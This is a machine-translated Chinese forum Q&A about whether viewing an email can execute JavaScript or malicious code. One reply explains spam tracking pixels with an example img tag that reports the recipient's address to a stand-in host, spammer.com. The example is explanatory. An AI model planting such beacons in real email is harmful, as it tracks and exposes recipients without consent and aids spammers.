注册
登录
恶意代码防范
在电子邮件中自动执行Javascript或恶意代码
返回
在电子邮件中自动执行Javascript或恶意代码
作者:
纾潆锦袖迷子
发布时间:
2024-04-10 01:53:23 (2月前)
转自:
<div class =“excerpt”> 被用作“信标”以向人员Web服务器报告该电子邮件地址是有效的。 如果仅通过查看或预览,电子邮件消息可以POST到Web服务器,是否也可以执行JS或其他 <span class =“result-highlight”> 恶毒 </跨度> <span class =“result-highlight”> 码 </跨度> ,如果以这种方式下载HTML /图像? </DIV>
收藏
举报
2 条回复
0#
回复此人
NetworkAttachedStorage
|
2019-08-31 10-32
<div class =“post-text”itemprop =“text”> <P> 不在电子邮件中显示图像更多的是您的电子邮件客户端采用的反垃圾邮件策略(现在大多数人都默认这样做)。 </p> <P> 例如,如果我要查找一堆活动的电子邮件帐户,我可以使用以下格式随机发送邮件: </p> <pre> <code> to: john@doe.com message: <img src="http://spammer.com/verifyAccount.png?account=john@doe.com"> </code> </pre> <P> 然后我可以设置我的Web服务器 <EM> spammer.com </EM> 记录收到的请求(同时提供图像),这样每次用户打开我的一封恶意电子邮件时,我都可以确定用户是否处于活动状态,这样就可以避免在不活动或不存在的帐户上浪费我的资源垃圾邮件。 </p> <P> 但同样,它是关于政策问题,而不是安全威胁,对于电子邮件可能尝试加载的任何外部资源(例如样式表)也是如此。 </p> <P> JS通常甚至不能在邮件客户端中使用,因此也没有来自该方面的真正威胁。 </p> </DIV>
编辑
登录
后才能参与评论
